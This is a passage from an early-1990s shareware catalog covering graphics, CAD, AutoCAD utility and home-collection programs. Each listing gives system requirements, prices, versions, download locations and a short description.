(call 315-472-1058 + to download it at no charge); SPLIT*.ZIP in PCVENC forum LIB 1 + (multiple files) on CompuServe; SPLIT*.ZIP in IBMPC RTC LIB 3 + (multiple files) on GEnie. + Download size: 640k + Description: + The venerable software classic that introduced the development + of lively, animated screen shows to the general computing + public. First released in 1985 and subsequently bundled with + the Microsoft Mouse for several years, this program has over + 750,000 users. This version updates the program with several + new screen effects, enhanced graphical menu capability, and + smoother animation/color palette manipulation. Included is a + royalty-free runtime module. + + Product: SlideManager + AutoCAD Slide Library Manager. See full description on + page 316. + + Product: STAFF-GRAF + Needs: IBM PC, DOS 3.0 or better. 640k RAM. Hard disk. Extended/ + expanded memory recommended. + Author: MSC - Morariu Software Consulting, 0049-6196-48524 + Registration: $39.00 + Version: 2.0 (01-01-91) + User benefits: Printed manul, latest version of the program, + phone support. + Look for: availability unknown on BBSs; STFGRA.ZIP in IBMAPP + forum LIB 3 on CompuServe. + Download size: 560k + Special instructions: Product distribution restricted to the + United States. + Description: + Data stored in all or selected records of a DBF file can + directly be plotted on the screen, printer or plotter in one or + more of the types: Line, Marks, Bar, Stacked Bar, Pie, High- + Low. Graphs can be stored on disk in PCX format. The + orientation of graphs can be portrait or landscape. Over 70 + printer and plotters are supported. Titles and a legend can be + defined. Scaling can be manual or automatic (logarithmic too). + Up to six functions can be plotted on one graph. A background + grid can be generated. + + Product: WAMPUM + Menu-Driven dBASE-Compat. DBMS in a 20K TSR. See full + description on page 139. + + Chapter 14, "Graphics" 305 + + + + 14.2 Drawing programs + + Product: The Children's Graphics Program [***] + Needs: IBM PC, DOS 2.0 or better. 256k RAM, mouse, EGA monitor. + Author: Motes Educational Software, 501-442-5652 + Registration: $10.00 + Version: 3.0 (12-12-91) + User benefits: Mail support. Shareware disks of other programs. + Look for: availability unknown on BBSs; DRAW30.ZIP in IBMAPP + forum LIB 10 on CompuServe. + Download size: 76k + Description: + Can be used to draw lines, boxes, circles, arcs, and macros. + These drawings can be painted, edited, stored, and even + animated. Pictures can be exported to other programs written + with PowerBasic. + + Product: Dad's Choice [***] + Children's math and graphics program. See full description on + page 300. + + Product: DRAFT CHOICE + Powerful, Vector Based CAD Program. See full description on + page 309. + + Product: FLODRAW + Needs: IBM PC, DOS 2.0 or better. 512k RAM, CGA monitor. + Registration: $37.50 + Version: 2.2 (11-30-90) + User benefits: Printed user manual, disk of symbols used in + symbol libraries. + Look for: FDRAW22*.ZIP (multiple files) on BBSs; FDRAW*.ZIP in + IBMAPP forum LIB 10 (multiple files) on CompuServe. + Download size: 260k + Description: + Draws black & white diagrams like flowcharts, electric + schematics, and organization charts. Great for documentation! + Symbol libraries for flowcharts, electronic schematics, logic + diagrams, and others included. Or draw your own symbols and + create your own symbol libraries. Automatic line drawing, last + symbol undo, multiple fonts, menu driven. Keyboard control + only. Includes utility to convert diagrams to PCX format files. + Interactive tutorial gets you started quickly. + + Chapter 14, "Graphics" 306 + + + + Product: Magic Brush & Magic Show + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: Nassib Nassar + Registration: $25.00 + Version: 1.50 (08-16-89) + User benefits: Printed manual and program disk, 1 year support by + mail, nominal upgrade fees. Overseas: add $6.00 for postage. + Look for: availability unknown on BBSs; MB150.ARC in IBMAPP forum + LIB 10 on CompuServe; MB150.ARC in IBMPC RTC LIB 14 on GEnie. + Download size: 140k + Description: + A drawing/painting and slide show program. It allows accurate + pixel by pixel control of drawing. Status screen overlay for + accurate cut and paste. Several paste modes, color remapping, + horizontal, vertical, or diagonal flip, on-line help screen. + Has simple script language for slide show and simple animation. + + Product: PathProj + Path Projection for Ridge Regression. See full description on + page 256. + + Product: PC-Draft-CAD + Vector based Computer Aided Design & Drafting. See full + description on page 309. + + Product: Recursive Realm + Fast and fun fractal exploration program. See full description + on page 255. + + Product: RXridge + Ridge Regression Computations & Graphics. See full description + on page 256. + + Product: RXtraces + Interactive Ridge Regression TRACE Displays. See full + description on page 257. + + Product: STAFF-GRAF + Graphics for Data stored in dBASE III format. See full + description on page 304. + + Product: Stringer/2 + Draws string art. See full description on page 293. + + + 14.3 Paint programs + + Product: The Children's Graphics Program [***] + Children's drawing, painting, and animation. See full + description on page 305. + + Product: Magic Brush & Magic Show + Drawing/painting and slide show for CGA. See full description + on page 305. + + Chapter 14, "Graphics" 307 + + + + Product: PC-Draft II + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: Natural Software, 708-377-7320 + Registration: $50.00 + Version: 3.26 (01-01-91) + User benefits: Printed manual, master disks, phone support, Clip- + Art Libraries. + Look for: PCDRAFT*.EXE (multiple files) on BBSs (call + 312-276-4159 to download it at no charge); PCDRA*.EXE in IBMAPP + forum LIB 10 (multiple files) on CompuServe. + Download size: 237k + Description: + Bitmap Paint program: pop-up menus or single keystroke + commands. Mouse support. Large clip art library. Screen + Capture. 40 fonts & font editor. Slide show language (PIX). + Uses CGA 640 x 200 mode. + + Draw circles, ellipses, lines, boxes, arcs, curves, spray + paint, free form draw. Draw bar, line and pie graphs. Create + and edit fill patterns. Keyboard macros. Grid/Snap. Undo. + Preview. Rotate & size objects. Cut & paste. Supports dot- + matrix & LaserJet printers. + + Exports GEM .IMG files. + + Product: QFont + Font editor for HP LaserJet soft fonts. See full description + on page 58. + + Product: Strudle + Needs: IBM PC, DOS 3.0 or better. EGA monitor. + Author: ShareGames, 619-283-0472 + Registration: $30.00 + Version: 3.8 (06-22-90) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: STRUDLE.ZIP on BBSs (call 619-440-0899 to download it + at no charge). + Download size: 109k + Description: + This is a unique drawing/painting program for children of any + age. It's an excellent educational, developmental, FUN tool + designed to be as simple as possible. It's actually a child's + "crayola" version of an art-quality drawing program. It has + sound effects, saves drawings to work on or enjoy again later, + and much more. It's fun watching the drawings happen again. + Ten sample drawings are included. When drawings are loaded + they are redrawn as if you were watching them the first time. + + Chapter 14, "Graphics" 308 + + + + 14.3.1 Graphics diversions + + Product: Dr. Motes' Colorbook [***] + Needs: IBM PC, DOS 2.0 or better. 256k RAM, EGA monitor, mouse. + Author: Motes Educational Software, 501-442-5652 + Registration: $10.00 + Version: 1.0 (02-02-92) + User benefits: More graphics pages. Shareware disks of other + programs. + Look for: availability unknown on BBSs; DMCB.ZIP in IBMAPP forum + LIB 10 on CompuServe. + Download size: 61k + Description: + This program can be used like a children's coloring book. It + comes with several pages of graphics pictures that can be + painted/colored using 16 different colors. Easy to use and fun + for the little ones. + + + 14.4 Presentation graphics + + Product: HyperSlide + Needs: IBM PC, DOS 2.1 or better. Mouse; CGA monitor. + Author: John Intorcio, 617-246-9640 + Registration: $50.00 + Version: 1.02 (05-12-91) + User benefits: Printed Manual & Disk, Telephone Support. + Look for: HYPSLD.EXE on BBSs (call 206-643-5477 to download it at + no charge); HYPSLD.EXE in ASDESK forum LIB 10 on CompuServe. + Download size: 287k + Description: + A presentation system based on AutoCAD slide (.SLD) files. It + allows the generation of stand-alone .EXE files containing all + images and control structures. The presentation designer + allows for rapid presentation design by using menus to allow + inclusion of slide images and placemnt of buttons and controls. + Control types include simple links, timed links, shells to + external programs, etc. + + Product: Magic Brush & Magic Show + Drawing/painting and slide show for CGA. See full description + on page 305. + + Product: MakeDemo + Presentation program with interactive menuing. See full + description on page 167. + + Product: SlideManager + AutoCAD Slide Library Manager. See full description on + page 316. + + Product: STAFF-GRAF + Graphics for Data stored in dBASE III format. See full + description on page 304. + + Chapter 14, "Graphics" 309 + + + + 14.5 CAD/CAM applications + + See also: Engineering (page 233). + + Product: DRAFT CHOICE + Needs: IBM PC, DOS 2.11 or better. 412k RAM; Hercules or CGA + monitor; dual floppy drives or a hard disk. + Author: TRIUS, Inc., 508-794-9377 + Registration: $56.00 + Version: 1.51g (01-09-92) + User benefits: Printed manual, master disks, bonus utilities, + bonus fonts, bonus symbol libraries, 90-day support, + newsletter. + Look for: DC151.ZIP on BBSs (call 617-354-2505 to download it at + no charge); DC151.ZIP in IBMAPP forum LIB 10 on CompuServe. + Download size: 315k + Special instructions: Product distribution restricted to the + United States. + Description: + Vector Based, affordable CAD program with over 180 Drawing, + Viewing and Editing commands. Mouse and Keyboard Operation. 9- + pin, 24-pin, HP Laserjet/Deskjet and HP Pen Plotter Support. + Auto-dimensioning, Multiple Layers, English and Metric Units, + Auto-Scaling, Powerful Floating Point Zoom. Symbol Library + Support, Animation, On-Line calculator, Parametric Function + Generator, EEMS and Virtual Memory Support, Primary and + Secondary Text Fonts, and much more... + + Product: Layout + Office layout and equipment inventory. See full description on + page 195. + + Product: PC-Draft-CAD + Needs: IBM PC, DOS 2.0 or better. CGA or Hercules monitor. HPGL + plotter or HP LaserJet or dot-matrix printer. + Author: Natural Software, 708-377-7320 + Registration: $65.00 + Version: 3.06 (06-01-91) + User benefits: Printed manual, master disks, utilities. + Look for: PCDCAD*.EXE (multiple files) on BBSs (call 312-276-4159 + to download it at no charge); PCCAD*.EXE in IBMAPP forum LIB 10 + (multiple files) on CompuServe. + Download size: 325k + Description: + Vector based CAD: Automatic dimensions, unlimited layers, + multiple fonts & object libraries. Uses high resoution CGA, + EGA, VGA, or Herc. "Virtual Memory" uses extended, expanded + memory or disk for drawings up to 32 megabytes. + + Pop up menus or single keystroke commands. Mouse support, + context sensitive help. Over 65 commands + undo/redo, pan, + zoom, fill patterns, Macros. Make exact scale prints with HPGL + plotters, dot-matrix or laser printers. Exports WPG GEM HPGL + ASCII. Imports WPG DXF ASCII. + + Chapter 14, "Graphics" 310 + + + + Product: PlotManager + Needs: IBM PC, DOS 2.1 or better. + Author: John Intorcio, 617-246-9640 + Registration: $50.00 + Version: 2.22 (05-13-91) + User benefits: Printed Manual and Disk, Telephone Support. + Look for: PLOTM.EXE on BBSs (call 206-643-5477 to download it at + no charge); PLOTM.EXE in ADESK forum LIB 10 on CompuServe. + Download size: 183k + Description: + Provides stand-alone, on-screen viewing of HPGL, DMPL, and SPGL + plot files, Plotting of zoomed views, plotter communictions + support to 38.4k baud, transaltion from plot format to .DXF + format for import into AutoCAD, network plot-server mode and + more. + + + 14.6 Business applications + + See also: Business (page 172). + + Product: ALPHAQUOTE + Needs: IBM PC, DOS 3.0 or better. + Author: AlphaBytes, Inc., 202-546-4119 + Registration: $29.00 + Version: 2.3 (05-06-91) + User benefits: Latest version and a printed manual. + Look for: AQ23.ZIP on BBSs (call 414-789-4202 to download it at + no charge); AQ23.EXE in DTPFORUM forum LIB 6 on CompuServe. + Download size: 113k + Description: + Estimating and copyfitting for DTP and typesetting. Useful for + determining how much graphic products should sell for. Great + for comparing the price differences between DTP and traditional + typesetting. Features include; hourly rates generator, graphic + arts calculator, disk or printed estimates, preview, on-line + help, menu interface and complete docs. + + 14.6.1 OCR applications + + Product: PRO-CR + Needs: IBM PC, DOS 3.0 or better. Scanner. + Author: Gray Design Associates + Registration: $42.00 + Version: 2.02 (06-02-91) + User benefits: Latest registered version. + Look for: availability unknown on BBSs; PRO-CR.EXE in IBMAPP + forum LIB 12 on CompuServe. + Download size: 160k + Description: + Professional optical character recognition. New features: Font + selection not required, preview mode, online correction mode, + supports 200 DPI (fax), mis-recognitions flagged, supports + + Chapter 14, "Graphics" 311 + + + + compressed tiffs and pcx files, CGA, EGA, VGA and Hercules. + Also includes optional command line interface from DOS. + + + 14.7 File format translators + + See also: Utilities, File utilities, File conversion (page 38). + + Product: CODE TO CODE + DTP & Typesetting code conversion program. See full + description on page 124. + + Product: Paint Shop Pro + Needs: IBM AT (80286), Windows 3.0 or better. + Author: JASC, Inc., 612-934-7117 + Registration: $49.00 + Version: 1.0 (02-26-92) + User benefits: Printed manual, master disks, support. + Look for: availability unknown on BBSs; PSP10.ZIP in GRAPHSUP + forum LIB 4 on CompuServe. + Download size: 310k + Description: + A Windows program that will display, convert, alter and print + images. It also does screen capturing. It supports image + formats; BMP, DIB, GIF, IMG, JAS, MAC, MSP, PIC, PCX, RAS, RLE, + TGA, TIFF and WPG. Display in various ways including zooming in + and out. Alter includes rotating, resizing, resampling, + trimming, filter application, color adjustments, brightness and + contrast adjusting, increasing and decreasing the color depth, + gamma correcting and greyscaling. User filters are supported. + + Product: PixFolio Image Catalog System + Windows Image Cataloging System. See full description on + page 12. + + + 14.8 Tools & utilities + + Product: Paint Shop Pro + Image displayer, converter, editor. Scrn Cap. See full + description on page 311. + + Product: PixFolio Image Catalog System + Windows Image Cataloging System. See full description on + page 12. + + Product: PrintGL + Pen plotter emulator. See full description on page 44. + + Product: QFont + Font editor for HP LaserJet soft fonts. See full description + on page 58. + + Chapter 14, "Graphics" 312 + + + + Product: RIE - Rimrock Icon Editor + Editor for creating custom EGA/VGA text icons. See full + description on page 274. + + Product: Show Partner Lite + Screen Show and Demo Disk Development System. See full + description on page 303. + + 14.8.1 Screen capture + + Product: Capbuf [***] + TSR captures text screens to disk. See full description on + page 72. + + Product: GEMCAP + Needs: IBM PC, DOS 2.0 or better. Any wordprocessor or desktop + publishing program that reads GEM .IMG format images. + Author: Natural Software, 708-377-7320 + Registration: $35.00 + Version: 4.01 (09-01-90) + User benefits: Master disks, phone support. + Look for: GEMCAP.ZIP on BBSs (call 312-276-4159 to download it at + no charge); GEMCAP.ZIP in IBMSYS forum LIB 3 on CompuServe. + Download size: 13k + Description: + TSR utility: Capture text and graphics screens, save as bitmap + GEM .IMG files (B&W), perfect for Ventura Publisher & + WordPerfect. Preserves reverse video fields in text mode. Uses + resident EGA/VGA font for EXACT reproduction of screen. Perfect + for user manuals. + + Supports CGA (640x300), EGA (640x350), VGA (640x480) graphics + modes & all text modes (25,43,50 lines). (Mono & Hercules - + text mode only). + + Product: PC-Draft II + Paint program w/screen capture. See full description on + page 307. + + Product: Textshot [***] + TSR to capture text screens to .PCX files. See full + description on page 73. + + + 14.9 Ready-made graphic images + + 14.9.1 Multi-format images + + Product: PixFolio Image Catalog System + Windows Image Cataloging System. See full description on + page 12. + + Chapter 14, "Graphics" 313 + + + + 14.9.2 PCX images + + Product: STAFF-GRAF + Graphics for Data stored in dBASE III format. See full + description on page 304. + + + 14.10 Software tools + + 14.10.1 For AutoCAD + + Product: -=Tab123=- + Needs: IBM PC, DOS 3.0 or better. Release 9 AutoCAD or later. + Author: Mountain Software, 304-744-7748 + Registration: $34.00 + Version: 1.2 (12-17-91) + User benefits: Printed manual, master disks, support, one year + free upgrades. + Look for: TAB123.ZIP on BBSs; TAB123.EXE in ACAD forum LIB 8 on + CompuServe; TAB123.ZIP in IBM-PC RTC LIB 14 on GEnie. + Download size: 46k + Description: + Imports Lotus 123 and Symphony spreadsheet files into an + AutoCAD drawing as a table of text entities, and if desired, a + cell grid to enclose the table. Tab123 runs from within the + AutoCAD drawing editor and will read .WKS and WK1 files + directly. The program reads not only entered data from the + spreadsheet file, but also calculated formula values and + formatting information (eq Column widths, cell formats). + + Product: AC11TO10 [***] + Needs: IBM PC, DOS 3.0 or better. NO coprocessor required! + Author: Software Designs, Inc., 606-987-6129 + Registration: $49.95 + Version: 2.20 (03-01-92) + User benefits: Unlimited phone/CompuServe/mail support, free + upgrades. + Look for: availability unknown on BBSs; 11TO10.ZIP in ADESK forum + LIB 10 on CompuServe. + Download size: 65k + Description: + This utility converts Release 11 drawings to Release 10 without + using DXF files. Just type 'AC11TO10' at the DOS prompt, tag + the drawings you want converted and hit ENTER. Works directly + with the DWG file format SAFELY. Single, easy-to-use, windowed + environment. Great for AutoCAD users who require access + Release 11 drawings but don't need to upgrade from Release 10. + + Chapter 14, "Graphics" 314 + + + + Product: ALLY + Needs: IBM PC, DOS 3.0 or better. AutoCAD release 9 or better. + Author: Wasco Technical Software, 713-392-1359 + Registration: $49.95 + Version: 1.32 (03-18-91) + User benefits: Diskette and printed manual, CIS/phone/fax + support, product news. + Look for: availability unknown on BBSs; ALLY13.ZIP in ADESK forum + LIB 2 on CompuServe. + Download size: 108k + Description: + A programer's workbench and analyzer for AutoLISP. The + analyzer aids in debugging and documenting AutoLISP source code + by error checking and cross-referencing Lisp symbols - + variables, constants, functions and subroutines. The workbench + features point-and-shoot file selection, a DOS shell, and + integrates your favorite editor, browser and other tools. Run + from DOS or AutoCAD. Rated "Highly Recommended" by CADalyst + magazine, March 1991. + + Product: CADET + Needs: IBM PC, DOS 3.0 or better. AutoCAD release 9 or better. + Author: Wasco Technical Software, 713-392-1359 + Registration: $49.95 + Version: 3.0 (03-18-91) + User benefits: Diskette and printed manual, CIS/phone/fax + support, product news. + Look for: availability unknown on BBSs; CADET3.ZIP in ADESK forum + LIB 10 on CompuServe. + Download size: 345k + Description: + Allows users to create notes and text tables, and edit both + text and attributes in AutoCAD drawings. + * Full-screen text editor + * 112,000+ word Spelling checker + * Pull-down menus + * Word wrap + * Help + * Status lines + * Search-and-replace + * Find text + * Cut-and-paste + * Change style, height and case + * EGA/VGA support + * Import and export text + * Works from within AutoCAD + + Chapter 14, "Graphics" 315 + + + + Product: Custom#Menu + Needs: IBM PC, DOS 3.0 or better. AutoCAD release 9 or later. + Author: Mountain Software, 304-744-7748 + Registration: $34.00 + Version: 1.81 (12-18-91) + User benefits: Printed manual, master disks, support, one year of + free upgrades. + Look for: CMENU181.ZIP on BBSs; CMNU18.EXE in ACAD forum LIB 8 on + CompuServe; CMENU181.ZIP in IBM-PC RTC LIB 14 on GEnie. + Download size: 85k + Description: + An easy to use AutoCAD menu customizing tool. Add, delete, or + modify Tablet, Button, and first level Popup and Screen menus + from within AutoCAD. "Learn" macros as they are entered and + includes an "Edit" mode for expert users. Multi command items + can be quickly created to greatly increase your productivity + with no knowledge of the AutoCAD menu structure. Special + support is also provided for block inserts and external + AutoLISP programs. Both Release 11 ADS and AutoLISP / DOS EXE + versions included. + + Product: HyperSlide + AutoCAD Slide FIle Based Hyper Link System. See full + description on page 308. + + Product: LaunchCAD + Needs: IBM PC, DOS 3.0 or better. AutoCAD release 9 or later. + Author: Mountain Software, 304-744-7748 + Registration: $34.00 + Version: 3.7 (10-07-91) + User benefits: Printed manual, master disks, support, one year + free upgrades. + Look for: LCAD37.ZIP on BBSs; LAUNCH.EXE in ACAD forum LIB 8 on + CompuServe; LCAD37.ZIP in IBM-PC RTC LIB 14 on GEnie. + Download size: 121k + Description: + A superb replacement for the AutoCAD opening menu, it provides + a friendly face, and file management capabilities to AutoCAD. + It compliments AutoCAD, it provides a fast pulldown menu + interface that allows: Drawing file selection from a popup + directory; User defined long file descriptions; Batch + processing and plotting from a user defined script; An external + utility interface; Network and release 11 support; File select + support for internal AutoCAD commands, and more. + + Product: PrintCAD + Printer driver for CAD software. See full description on + page 44. + + Product: PrintGL + Pen plotter emulator. See full description on page 44. + + Chapter 14, "Graphics" 316 + + + + Product: PURGE [***] + Needs: IBM PC, DOS 3.0 or better. NO coprocessor required! + Author: Software Designs, Inc., 606-987-6129 + Registration: $69.95 + Version: 2.20 (03-01-92) + User benefits: Phone/CompuServe/mail support free upgrades. + Look for: availability unknown on BBSs; PURGE.ZIP in ADESK forum + LIB 10 on CompuServe. + Download size: 70k + Description: + Lets you purge your drawings from the DOS prompt WITHOUT using + DXF files. Selectively purge any or all of Blocks, Linetypes, + Layers, Dimstyles or Shapes. Single, easy-to-use, windowed + environment. Just set which entities should be purged, tag the + drawings and press ENTER. Best of all, it operates in a SINGLE + pass - even deeply nested blocks are no problem! Quick, safe + and extremely easy to use. + + Product: SlideManager + Needs: IBM PC, DOS 2.1 or better. + Author: John Intorcio, 617-246-9640 + Registration: $25.00 + Version: 5.13 (05-13-91) + User benefits: Printed Manual & Disk, Telephone Support. + Look for: SLIDEM.EXE on BBSs (call 26-643-5477 to download it at + no charge); SLIDEM.EXE in ADESK forum LIB 10 on CompuServe. + Download size: 133k + Description: + A full function library manager for AutoCAD slide files. + SlideManager provides full library management functions such as + Add, Delete, Extract, Merge, and Update as well as stand-alone + viewing of slide files and entries from slide libraries. + Translation to Drawing Interchange or HPGL format as well as + output to printers is also provided. + + + 14.11 Other + + Product: Fantasy + Interactive graphic kaleidoscope - hypnotic. See full + description on page 389. + + Product: Listico + Two icon viewing programs, one DOS, one WIN 3. See full + description on page 303. + + Chapter 14, "Graphics" 317 + + + + Product: Quilt [***] + Needs: IBM PC, DOS 2.1 or better. EGA monitor. + Author: Cascoly Software, 206-523-6135 + Registration: $20.00 + Version: 1.21 (03-30-92) + User benefits: Phone/CompuServe support. + Look for: availability unknown on BBSs; QUILT.ZIP in IBMNEW forum + LIB 5 on CompuServe. + Download size: 50k + Description: + A diverting graphics program or nonresident screen saver, using + half square quilting patterns. You can create specific + patterns or set the program to continuously change patterns. + Change widths, patterns, rotate or flip the designs, or colors + for "billions and billions" of combinations. Configurable color + palettes (v1.1 lets you set 8 colors at a time) chosen from 64 + possible colors. Ages 8 to 88. + + Product: ZiPaper + Needs: IBM PC, Windows 3.0 or better. PKZIP/PKUNZIP or LHARC. + Author: Daniel Thomas, 714-524-5625 + Registration: $15.00 + Version: 1.3c (12-30-91) + User benefits: Disk, printed manual, assorted wallpaper files. + Look for: availability unknown on BBSs; ZIPAPR.ZIP in WINNEW + forum LIB 5 on CompuServe. + Download size: 49k + Description: + Randomly select Windows 3.0 .BMP files for wallpaper each time + you run Windows. Keep the .BMP files in one compressed ZIP or + LZH file. Save disk space! Supports Tile/Center and more. New + features include improved support for multiple ZIP files, + manual selection of BMP file, support for LHArc and more. + + Chapter 15, "Home & hobby" 318 + + + + + + Chapter 15 + Home & hobby + + See also: Finances, Personal finances (page 218); Business, + Work-at-home (page 211). + + + 15.1 Astronomy + + Product: PC-TRACK [***] + Needs: IBM PC, DOS 2.0 or better. EGA monitor, 640k RAM. + Author: Thomas C. Johnson, 513-878-9174 + Registration: $25.00 + Version: 2.14 (01-09-92) + User benefits: Printed manual, quick reference card, master + disks, six months support. + Look for: availability unknown on BBSs. + Download size: 355k + Description: + This general purpose satellite tracking package takes the + complexity and confusion out of finding where any earth + orbiting satellites (weather, amateur radio, military, foreign, + etc.) are in space. It will track up to 8 satellites + simultaneously and will provide necessary antenna pointing + data. It provides a colorful, graphical means of visualizing + satellite orbits both in stunning 3D spherical displays and + flat map displays. + + + 15.2 Collecting + + Product: ALBUM KEEPER II + Needs: IBM PC, DOS 3.0 or better. 512k RAM. Hard Disk + recommended. + Author: CACHE MICROSYSTEMS, 805-549-0532 + Registration: $17.00 + Version: 2.12 (06-01-91) + User benefits: 1 yr. Technical support. + Look for: ALBUM212.ZIP on BBSs (call 414-789-4210 to download it + at no charge). + Download size: 198k + Special instructions: Product distribution restricted to the + United States. + Description: + Easy to menu driven album, CD, Tape organizer. This program + keeps track of the entire album collection. Unique features + allow the user to find albums, song titles and artists. This + program keeps track of album titles and songs on album with + tape position,length of song and song number. Duplicate entry + search keeps database clean and useful. Several printer outputs + allows user to print complete list of album, individual albums, + + Chapter 15, "Home & hobby" 319 + + + + labels for tapes. 10 user defined fields. Laser printer + support. + + Product: AlbumMaster [***] + Needs: IBM PC, DOS 2.1 or better. IBM Graphics printer. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $25.00 + Version: 6.71 (09-02-91) + User benefits: Master disks, phone/BBS/mail support. Shareware + disks of other programs. + Look for: AMSTR670.ZIP on BBSs (call 317-784-2147 to download it + at no charge); AMSTR6.ZIP in IBMAPP forum LIB 7 on CompuServe. + Download size: 160k + Description: + Designed for audiophiles who want to catalog their albums and + produce professional looking printouts, the program is easy to + use and POWERFUL. Standard entries for Title, Artist, Album + Number, Category, and Tunes PLUS 3 User Defined Fields! The + user can obtain print outs for criteria or all, and can search + for all fields or combination, even Tunes! Print Outs include: + An abbreviated listing, full catalog, a custom lisiting, 3X5 + and Rolodex cards, front labels, and a complete Tune listing! + + Product: Book Librarian + Needs: IBM PC, DOS 2.11 or better. 512K Ram, Color Monitor + Recommended. + Author: TurboSystemsCo, 404-516-8575 + Registration: $34.95 + Version: 1.5s (01-28-92) + User benefits: Latest version, printed manual, free technical + support, product discounts, update/upgrade notices. + Look for: BL.ZIP on BBSs; BL.ZIP in IBMAPP forum LIB 7 on + CompuServe; BL15.ZIP in IBMPC RTC LIB 15 on GEnie. + Download size: 147k + Description: + Powerful easy-to-use menu-driven program to organize and manage + a personal, club, corporate, church or school library. Features + context sensitive help, BROWSE and FIND windows. Each record + stores title, author, subject, book type, catalog # and much + more. Full featured reporting with numerous reports to the + screen, printer or disk. + + Chapter 15, "Home & hobby" 320 + + + + Product: CassetteMaster + Needs: IBM PC, DOS 2.1 or better. IBM Graphics printer. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $25.00 + Version: 7.40 (07-20-91) + User benefits: Master disks, phone/BBS/mail support. Shareware + disks of other programs. + Look for: CMSTR740.ZIP on BBSs (call 317-784-2147 to download it + at no charge); CMSTR7.ZIP in IBMAPP forum LIB 7 on CompuServe. + Download size: 160k + Description: + Designed for users who want to catalog their cassettes and + produce professional looking printouts, the program is easy to + use and POWERFUL. Standard entries for Title, Artist, Tape + Number, Category, and Tunes PLUS 3 User Defined Fields! The + user can obtain print outs for criteria or all, and can search + for all fields or combination, even Tunes! Print Outs include: + An abbreviated listing, full catalog, a custom lisiting, 3X5 + and Rolodex cards, front labels, or J Card style case inserts & + a Tune list! + + Product: CDMaster + Needs: IBM PC, DOS 2.1 or better. IBM Graphics printer. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $25.00 + Version: 6.71a (10-06-91) + User benefits: Master disks, phone/BBS/mail support, bonus + utilities. Shareware disks of other programs. + Look for: CDMSTR67.ZIP on BBSs (call 317-784-2147 to download it + at no charge); CDMSTR.ZIP in IBMAPP forum LIB 7 on CompuServe. + Download size: 160k + Description: + CD lovers need a program as sophisticated as the format itself + to catalog their collections. This is the answer! The program + is easy to use and POWERFUL. Standard entries for Title, + Artist, CD Number, Category, and Tunes PLUS 3 User Defined + Fields! The user can obtain print outs for criteria or all, and + can search for all fields or combination, even Tunes! Print + Outs include: An abbreviated listing, full catalog, a custom + lisiting, 3X5 and Rolodex cards, front labels, and a complete + Tune list! + + Chapter 15, "Home & hobby" 321 + + + + Product: Collect! (VGA version) + Needs: IBM AT (80286), DOS 3.3 or better. Mouse,VGA. + Author: Alston Software Labs, 209-522-8666 + Registration: $40.00 + Version: 1.01 (01-01-92) + User benefits: 1 year voice/fax/CIS/mail support, 1 year free + upgrades, text version disk. + Look for: availability unknown on BBSs; COLECT.ZIP in IBMAPP + forum LIB 7 on CompuServe; COLLECT!.ZIP in IBM RTC LIB 0 on + GEnie. + Download size: 285k + Description: + Designed for the range of casual collectibles lover to the + dealer, the VGA VERSION shares files with it's text mode + sibling and adds a 640 x 480 pixel GUI featuring pushable + pushbuttons, clipboard feature, data graphing, and more. It is + fully user configurable and works with ANY collection you may + have. Extensive financial analysis capability allows you to + plan a collection properly, and powerful file manipulation + tools keeps a collection organised. Text mode works with _any_ + 512K PC. + + Product: DiscTrak System + LaserDisc & Compact Disc Cataloging Program. See full + description on page 329. + + Product: Household Register + Needs: IBM PC, DOS 2.1 or better. 384k RAM. + Author: TurboSystemsCo, 404-516-8575 + Registration: $34.95 + Version: 3.0s (01-28-92) + User benefits: Printed manual, latest version, technical support, + product discounts. + Look for: HR.ZIP on BBSs; HR.ZIP in IBMAPP forum LIB 7 on + CompuServe; HR30.ZIP in IBMPC RTC LIB 15 on GEnie. + Download size: 153k + Description: + Excellent easy-to-use menu-driven home/office inventory program + holds upto 99,999 items and can use an unlimited number of + databases. Includes complete database management functions and + full featured report printing. Lists reports to screen, + printer or disk. A valuation report prints your inventory and a + summary of total items by category, location or owner. + Features: Pop-up pick lists; On-line help; warranty lists + showing warranty expiration dates, a sample database and much + more. + + Chapter 15, "Home & hobby" 322 + + + + Product: Music Manager for Windows [***] + Needs: IBM AT (80286), Windows 3.0 or better. Standard or 386 + Enhanced mode. VGA recommended. + Author: Joe Herrera, 817-382-7585 + Registration: $25.00 + Version: 1.10 (03-15-92) + User benefits: 90 days phone support, one free upgrade. + Look for: availability unknown on BBSs; MM110.ZIP in WINADV forum + LIB 1 on CompuServe. + Download size: 130k + Description: + A MUST for any serious music collector. Keep track of your + entire music collection, up to 1000 entries. Store information + on Artist, Title, Record Label, Format, Classification, and + Year. Select which fields to display while viewing the + database. Keep the database sorted by specifying up to 3 + unique fields. Search for text within the entire database. + Print the entire database or a range of records. + + Product: MuziTrak System + Compact Disc Cataloging Database. See full description on + page 347. + + Product: ORGANIZE! Jazz Collection [***] + Needs: IBM PC, DOS 3.1 or better. Hard disk recommended. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Version: 5.27 (03-23-92) + User benefits: Printed manual, quick reference card, support, + updates, bonus utilities. + Look for: JAZZ527.ZIP on BBSs. + Download size: 300k + Description: + A database system designed specifically for cataloging jazz + collections. You can catalog your collection using up to 21 + criteria including the basics such as title, artist, composer, + and label. Plus you keep track of the individual performers on + each composition. All of the information you enter can be + found during a search, cross referenced, sorted and + alphabetized. Includes a repeat key and macros to make + entering information about your collection quick and easy. + + Chapter 15, "Home & hobby" 323 + + + + Product: ORGANIZE! Memorabilia [***] + Needs: IBM PC, DOS 3.1 or better. Hard disk recommended. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Version: 5.27 (03-23-92) + User benefits: Printed manual, quick reference card, support, + updates, bonus utilities. + Look for: MEM527.ZIP on BBSs. + Download size: 300k + Description: + For collectors of memorabilia this is the software that can + help you organize your collection so you know what you have, + where it is stored and what it is worth. Plus you can also use + this software to keep wanted, available for trade, and for sale + lists. 3-D drop down menus and WYSIWYG screens make usiung + this software easy. You can catalog each piece in your + collection by up to 21 criteria, all of which can be searched, + cross referenced, sorted and alphabetized. + + Product: ORGANIZE! Professional Books [***] + Cataloging system for professional books. See full description + on page 204. + + Product: ORGANIZE! Your Art [***] + Needs: IBM PC, DOS 3.1 or better. Hard disk 